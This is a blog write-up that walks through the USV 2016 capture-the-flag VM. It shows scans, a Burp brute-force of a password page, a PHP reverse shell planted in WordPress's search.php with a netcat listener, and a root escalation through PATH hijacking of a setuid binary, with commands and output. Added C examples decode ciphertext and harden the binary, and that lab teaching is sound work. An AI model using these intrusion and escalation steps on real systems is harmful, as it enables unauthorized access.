30 March 2023

Pentesting Fun Stuff

following the cyber security path…

USV: 2016

Location

https://download.vulnhub.com/usv-2016/USV-CTF.ova

Introduction

Instructions: The CTF is a virtual machine and has been tested in Virtual Box. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take its IP settings from DHCP.
Flags: There are 7 flags that should be discovered in the form of: Country_name Flag: [md5 hash]. In the CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenge creation, evaluation of results and building of the CTF environment were provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)

Getting Started

Starting with an nmap scan.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-28 21:27 CET
Nmap scan report for 192.168.171.3
Host is up (0.00088s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.3 (protocol 2.0)
| ssh-hostkey:
|   2048 d8:b9:dd:8e:e7:d1:95:52:2c:98:bf:e0:65:7a:b0:92 (RSA)
|_  256 08:03:90:eb:24:5b:dd:67:f9:1f:4d:1e:60:93:a7:e3 (ECDSA)
80/tcp    open  http       Apache httpd
|_http-server-header: Apache
|_http-title: Access forbidden!
3129/tcp  open  http-proxy Squid http proxy 3.5.22
|_http-server-header: squid/3.5.22
|_http-title: ERROR: The requested URL could not be retrieved
3306/tcp  open  mysql      MariaDB (unauthorized)
4444/tcp  open  krb524?
| fingerprint-strings:
|   NULL:
|     HTTP/1.0 504 Gateway Timeout
|     Pragma: no-cache
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|_    <html><body>Connection to server <b></b> failed (Connection actively refused by the server.)<P></body></html> {600}
21211/tcp open  ftp        vsftpd 2.0.8 or later
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.40%I=7%D=12/28%Time=58642048%P=x86_64-pc-linux-gnu%r(N
SF:ULL,E1,"HTTP/1\.0\x20504\x20Gateway\x20Timeout\r\nPragma:\x20no-cache\r
SF:\nConnection:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\
SF:r\n\r\n<html><body>Connection\x20to\x20server\x20<b></b>\x20failed\x20\
SF:(Connection\x20actively\x20refused\x20by\x20the\x20server\.\)<P></body>
SF:</html>\x20{600}\n");
MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SevenKingdoms
TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.171.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.55 seconds

As a result I get a lot of open ports and services running on them. It seems there is SSH, HTTP, an HTTP proxy, MySQL, Kerberos and an FTP server running on a registered port.
The host name is “SevenKingdoms”, which is a reference to the TV show “Game of Thrones”.
I’ll start by checking whether there is an interesting banner on the SSH server.

I get a nice picture and an encrypted or salted-hash string. After looking at the picture more closely I see that there is a hidden message: there are letters visible which, when combined, spell out AES ECB.
There are also characters visible near the tail. So I have a cipher and mode (AES in ECB mode), a key and a piece of ciphertext.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-128-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-192-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-256-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number

As this doesn’t give me the desired response, I try an online solution, with more luck.
Italy Flag: 0047449b33fbae830d833721edaef6f1
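The “bad magic number” above is openssl’s own complaint: with -k it expects the container that openssl enc produces, which starts with the 8-byte magic “Salted__” plus a salt, and derives the key from the passphrase; a raw AES-ECB blob encrypted with a literal key has no such header and must be given the key as hex via -K instead. The following C program is an added example, not part of the original write-up: it decodes a base64 blob, reports whether the “Salted__” header is present and whether the length is block-aligned, and turns a key string into the -K hex argument. The key “ConstructedKey16” and the salted sample blob are constructed placeholders, since the real key is redacted above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Ciphertext exactly as quoted from the SSH banner in the write-up. */
const char BANNER_CT_B64[] =
    "wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB";
/* Constructed sample in openssl enc's container format:
 * "Salted__" + 8 salt bytes + 16 bytes of (fake) ciphertext. */
const char SALTED_SAMPLE_B64[] = "U2FsdGVkX19BQkNERUZHSDAxMjM0NTY3ODlhYmNkZWY=";

enum blob_kind { BLOB_BAD = -1, BLOB_RAW_BLOCKS = 0, BLOB_OPENSSL_SALTED = 1, BLOB_UNALIGNED = 2 };

/* Minimal base64 decoder (no whitespace handling); returns byte count or -1. */
int b64_decode(const char *in, uint8_t *out, size_t cap) {
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    uint32_t acc = 0;
    int bits = 0;
    size_t n = 0;
    for (; *in && *in != '='; in++) {
        const char *p = strchr(tbl, *in);
        if (p == NULL) return -1;
        acc = (acc << 6) | (uint32_t)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= cap) return -1;
            out[n++] = (uint8_t)(acc >> bits);   /* low 8 bits of the window */
        }
    }
    return (int)n;
}

/* Is this an openssl enc container (decrypt with -k / passphrase) or raw
 * block-cipher output (decrypt with -K / hex key)? */
int classify_blob(const char *b64, int *out_len) {
    uint8_t buf[512];
    int n = b64_decode(b64, buf, sizeof buf);
    if (n < 0) return BLOB_BAD;
    if (out_len) *out_len = n;
    if (n >= 16 && memcmp(buf, "Salted__", 8) == 0) return BLOB_OPENSSL_SALTED;
    return (n % 16 == 0) ? BLOB_RAW_BLOCKS : BLOB_UNALIGNED;
}

/* Hex-encode a literal key for "openssl enc -aes-<bits>-ecb -d -a -K <hex>".
 * Returns the AES key size in bits, or -1 if the key is not 16/24/32 bytes. */
int key_to_hex_arg(const char *key, char *out, size_t cap) {
    size_t len = strlen(key);
    if ((len != 16 && len != 24 && len != 32) || cap < 2 * len + 1) return -1;
    for (size_t i = 0; i < len; i++)
        snprintf(out + 2 * i, 3, "%02x", (unsigned char)key[i]);
    return (int)(len * 8);
}

int main(void) {
    int n = 0;
    char hex[65];
    int kind = classify_blob(BANNER_CT_B64, &n);
    int bits = key_to_hex_arg("ConstructedKey16", hex, sizeof hex); /* placeholder key */
    printf("banner blob: %d bytes, kind %d (0 = raw blocks, 1 = Salted__)\n", n, kind);
    if (kind == BLOB_RAW_BLOCKS && bits > 0)
        printf("use: openssl enc -aes-%d-ecb -d -a -K %s\n", bits, hex);
    return 0;
}
```

The banner blob decodes to 48 bytes with no header, i.e. three raw AES blocks, which is why -k fails and -K with the hex key is the right invocation.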
Next stop is port 80. After browsing to the website I get a custom-made 403 error page.

All the scans turn up the same 403 error. After I ran Nikto I got a result that the directory /icons/ was accessible. Because there were a lot of pictures I could wget them all (in the hope that one is altered), but because there are more leads to follow I write it down and continue the search.
When I load the website again, but this time through Burp Suite, I can see that there is an XSS-protection header in the server response whose value is a base64-encoded string.
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
After a quick decode I get my second flag: Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
There are more open ports. One is a Squid proxy server on port 3129. After some reading I learned that Squid is a web proxy cache server application which provides proxy and cache services for a whole list of protocols like HTTP. So my next step is to run my browser through that proxy and see if the website on port 80 will load.

With dirb I find a blog.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/ -p http://192.168.171.3:3129
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 29 11:45:49 2016
URL_BASE: http://192.168.171.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.171.3:3129
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.171.3/ ----
==> DIRECTORY: http://192.168.171.3/blog/
+ http://192.168.171.3/index.html (CODE:200|SIZE:3181)
---- Entering directory: http://192.168.171.3/blog/ ----
+ http://192.168.171.3/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.171.3/blog/wp-admin/
==> DIRECTORY: http://192.168.171.3/blog/wp-content/
==> DIRECTORY: http://192.168.171.3/blog/wp-includes/
+ http://192.168.171.3/blog/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.171.3/blog/wp-admin/ ----
+ http://192.168.171.3/blog/wp-admin/admin.php (CODE:302|SIZE:0)
-----SNIP-----

After I browsed to the blog I found a few things that got my attention. One of them was a picture of Hodor with the text “I have a message for you!”.

After downloading it to my machine there was nothing to be found with exiftool or hexdump. But inside the folder where the picture resided there was something: a zipped file.
When I downloaded the file and extracted the picture that was inside, I got another view of Hodor, this time with my next flag. The string was part of the picture and not in the metadata, so I used an online OCR scanner to get the string the easy way.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y=' | base64 -d
Portugal Flag: a2663b23045de56c7e96a406429f733f

Next I proceed with the second interesting find on the website: a protected area for which I need a password. Because there is a lot of text on the website about “Game of Thrones” I figure that the password could be somewhere in there. So I create a wordlist with CeWL.

┌─[n13mant@planetmars]─[~]
└──╼ $cewl -d 2 -m 5 --proxy_host 192.168.171.3 --proxy_port 3129 -w ./Desktop/tgot.list http://192.168.171.3/blog/

To understand how the password is submitted I followed the HTTP requests in Burp. When I enter a random password the process starts with a POST request followed by a GET request which has a cookie added to it. This cookie consists of the encoded password I entered.


So for me to brute-force the password successfully I need Burp Suite to follow the redirects and process the cookies it is given.


With this password I get the next flag.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk=' | base64 -d
Paraguay Flag: 4761b65f20053674657c7e6186628a29

On the same page there is a clue about a password.

At first I thought about the password and the possibility that the facial expressions showed a clue. But I’ve learned from previous challenges that the easiest explanation is often the best and the needed credentials are in plain sight. So I needed to interpret the text as literally as possible.
The “mother_of_dragons” has a password which is “in front of your eyes”.
With this credential I checked the remaining services running on the open ports. When I use it on the FTP server it lets me in.

On the server there is a file called “readme.txt”. The content of this file is “I keep a hidden note for myself”. A hidden ‘note’. Like before, the answer is in plain sight. The mentioned hidden note I found when browsing to “/.note.txt”:
I always forgot passwords, so for my blog account I used my children's name. -= Daenerys =-
No flag, but a good clue about the password needed for the admin part of the WordPress blog.
The clue said “children’s name”, plural. So it could be her son or maybe the dragons, as she sees them as her children.
Because there is a nice feature that lets me reset the password I could figure out which username was the correct one. At first I thought it was “Daenerys”, but it turned out it was still “mother_of_dragons”. As for the correct password, it was a combination of all the dragon names that got me in.

After some browsing I found the next flag which was in the profile of the mother of dragons.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM=' | base64 -d
Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

To get a reverse shell I altered the search.php file and added the PHP reverse-shell script from pentestmonkey to it. Next I opened a listener on my end and pressed the search button to trigger the shell script.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 38870
Linux arch 4.8.8-1-ARCH #1 SMP PREEMPT Tue Nov 15 08:25:24 CET 2016 x86_64 GNU/Linux
 07:58:47 up 11:45,  0 users,  load average: 0.03, 0.06, 0.02
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(http) gid=33(http) groups=33(http)
sh: cannot set terminal process group (242): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ id
id
uid=33(http) gid=33(http) groups=33(http)

After searching inside the system I found the next flag.

[http@arch /]$ ls -lah
ls -lah
total 57K
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 .
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 ..
lrwxrwxrwx  1 root root    7 Sep 30  2015 bin -> usr/bin
drwxr-xr-x  4 root root 1.0K Nov 16 12:30 boot
drwxr-xr-x 17 root root 2.9K Dec 28 20:13 dev
drwxr-xr-x 51 root root 4.0K Dec  8 17:51 etc
drwxr-xr-x  3 root root 4.0K Nov 16 15:44 home
lrwxrwxrwx  1 root root    7 Sep 30  2015 lib -> usr/lib
lrwxrwxrwx  1 root root    7 Sep 30  2015 lib64 -> usr/lib
drwx------  2 root root  16K Dec  5  2013 lost+found
drwxr-xr-x  2 root root 4.0K May 31  2013 mnt
drwxr-xr-x  2 root root 4.0K May 31  2013 opt
dr-xr-xr-x 95 root root    0 Dec 28 20:13 proc
drwxr-x---  7 root root 4.0K Dec 28 20:13 root
drwxr-xr-x 19 root root  600 Dec 28 20:13 run
lrwxrwxrwx  1 root root    7 Sep 30  2015 sbin -> usr/bin
drwxr-xr-x  4 root root 4.0K May 31  2013 srv
dr-xr-xr-x 13 root root    0 Dec 29 08:01 sys
drwxrwxrwt  2 root root   40 Dec 28 20:13 tmp
drwxr-xr-x  8 root root 4.0K Nov  7 20:39 usr
drwxr-xr-x 12 root root 4.0K Nov  7 19:58 var
[http@arch /]$ cd srv
cd srv
[http@arch srv]$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K May 31  2013 .
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 ..
dr-xr-xr-x  2 root ftp  4.0K May 31  2013 ftp
drwxr-xr-x  3 root root 4.0K Nov 17 15:43 http
[http@arch srv]$ cd http
cd http
[http@arch http]$ ls -lah
ls -lah
total 92K
drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
drwxr-xr-x 4 root root 4.0K May 31  2013 ..
drwxr-xr-x 6 http http 4.0K Dec  4 06:01 blog
-rw-r--r-- 1 root root  59K Nov 16 19:59 gtr.jpg
-rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
-rw-r--r-- 1 root root   65 Nov 17 15:41 reward_flag.txt
-rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger
[http@arch http]$ cat reward_flag.txt
cat reward_flag.txt
TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
[http@arch http]$ echo 'TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d
<MxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d
Mongolia Flag: 6b49c13cccd91940f09d79e142108394

There is a file called “winterfell_messenger” which is owned by root and has the setuid and setgid bits set (-rwsr-sr-x).

[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
cat: /root/message.txt: No such file or directory

When I run it I can see that it tries to use the command “cat” to read a file called “/root/message.txt”.

[http@arch http]$ strings winterfell_messenger
strings winterfell_messenger
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-8
AWAVA
AUATL
[]A\A]A^A_
cat /root/message.txt
;*3$"
GCC: (GNU) 6.1.1 20160802
GCC: (GNU) 6.2.1 20160830
-----SNIP-----

So setuid is called and the command “cat” is run (via system) by its bare name instead of an absolute path, which means it is looked up through my PATH. To obtain root I’m going to create a file called “cat” whose content is “/bin/bash”.
The location of this file will be prepended to PATH so the binary runs my version of “cat”.

[http@arch http]$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
[http@arch http]$ chmod +x /tmp/cat
chmod +x /tmp/cat
[http@arch http]$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
<p:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ cd /srv/http
cd /srv/http
[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
[root@arch http]# id
id
uid=0(root) gid=33(http) groups=33(http)
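The defect in winterfell_messenger from the defender’s side, as an added example that is not the challenge’s own source: the first function reconstructs the behaviour the strings output implies (setuid, then system() with a bare “cat”), the second is a quick audit check for that pattern in strings or disassembly output, and the third is the hardened form, which executes an absolute path with a scrubbed environment and no shell. /bin/cat and /dev/null in main are stand-ins so it runs without privileges.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Reconstructed from the strings output above (setuid, system, "cat /root/message.txt");
 * this is NOT the original binary's source. The defect: "cat" is resolved through the
 * caller's PATH while the process runs as root, so a caller-controlled PATH wins. */
int read_message_vulnerable(void) {
    if (setuid(0) != 0) return -1;
    return system("cat /root/message.txt");
}

/* Audit check: does a command invoke its program by bare name (PATH lookup)
 * rather than by an absolute path? 1 = relative (suspect), 0 = absolute. */
int command_uses_relative_program(const char *cmd) {
    size_t name_len = strcspn(cmd, " \t");
    return memchr(cmd, '/', name_len) == NULL;
}

/* Hardened replacement: no shell, absolute program path, and a scrubbed environment
 * with a fixed PATH, so nothing the caller controls influences what gets executed.
 * (Better still for a one-file reader: open() and copy the file in-process.)
 * Returns the child's exit status, or -1 on a relative path or fork/exec failure. */
int run_privileged_reader(const char *prog, const char *file) {
    if (prog == NULL || prog[0] != '/') return -1;
    char *const argv[] = { (char *)prog, (char *)file, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(prog, argv, envp);
        _exit(127);                          /* only reached if execve failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status) == 127 ? -1 : WEXITSTATUS(status);
}

int main(void) {
    printf("relative program in \"cat /root/message.txt\": %d\n",
           command_uses_relative_program("cat /root/message.txt"));
    /* /dev/null stands in for /root/message.txt so this runs unprivileged. */
    printf("hardened reader exit status: %d\n",
           run_privileged_reader("/bin/cat", "/dev/null"));
    return 0;
}
```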

After getting root it’s time to get the final flag.

[root@arch root]# /usr/sbin/cat .flag.txt
/usr/sbin/cat .flag.txt
                                                                            ,aa,       ,aa
Congratulations!                                                           d"  "b    ,d",`b
                                                                         ,dP a  "b,ad8' 8 8
                                                                         d8' 8  ,8P'Y8a 8 8
                                                                        d8baa8baP'    `Y8a8
                                                                     ,adP"'               Y,
                                                                  ,a8P"               a   `b
                                                              ,aadP"              (0  Y, 0 8
                          ____________________________,,aaddPP""'8'         I          "a  8
                    ,aad8PP"""""""""""""""""""""""""""""'        8,         `b,          "aP
                ,adP"                                             "a          "ba,.     d888
             ,dP"                                                   "a,           "a,   `88'
            a"                                                         "'           `""8"'
           d"                                                                        ,8'
          d"                                                                        ,8'
          8                                                                       ,a8'
          8                         b                                            aP"
          8                         `b                                         ,8"
         (8    b,                    `b,                 a,                   dP'
         I8    `8,                    `b                d'                 ,aP"
         8'     `8,                   ,P               d'               ,a8P"
        I8       "b                  ,8'              ,8             ,d"d"'
       ,8'        8b               ,dP""""""""""""""""Y8           ,d",d'
     ,d"         d"8b            ,dP'                  "b,        ,P' d'
   ,d"         ,d' dPb,        ,dP'                      "b,      8'  8
  d"         ,d" ,d"  8      ,d"'                         `b      P   8
 d"        ,d" ,d"  ,d"    ,d"                             8      I   8
d"      ,dP' ,d"  ,d"    ,d"                               8      I   8
8,  ,ad8P' ,d"   (P'    d"                                 8      8   8
"YP"'"8   ,8'    Ib    d"                                  Y      8   8
      8   d"     `8    8                                   `b     8   Y
      8   8       8,   8,                                   8     Y   `b
      8   Y,      `b   `b                                   Y     `b   `b
      Y,   "ba,    `b   `b,                                 `b     8,   `"ba,
       "b,   "8     `b    `""b                               `b     `Yaa,adP'
         """""'      `baaaaaaP                                `YaaaadP"'
U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==' | base64 -d
Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

Conclusion

A fun challenge with some nice features.

3 thoughts on “USV: 2016”

  1. Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute force the password….I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
    I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Iceweasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
    Many Thanks! J

    1. Hi Jo.
      In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
      The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
      As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
      If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2
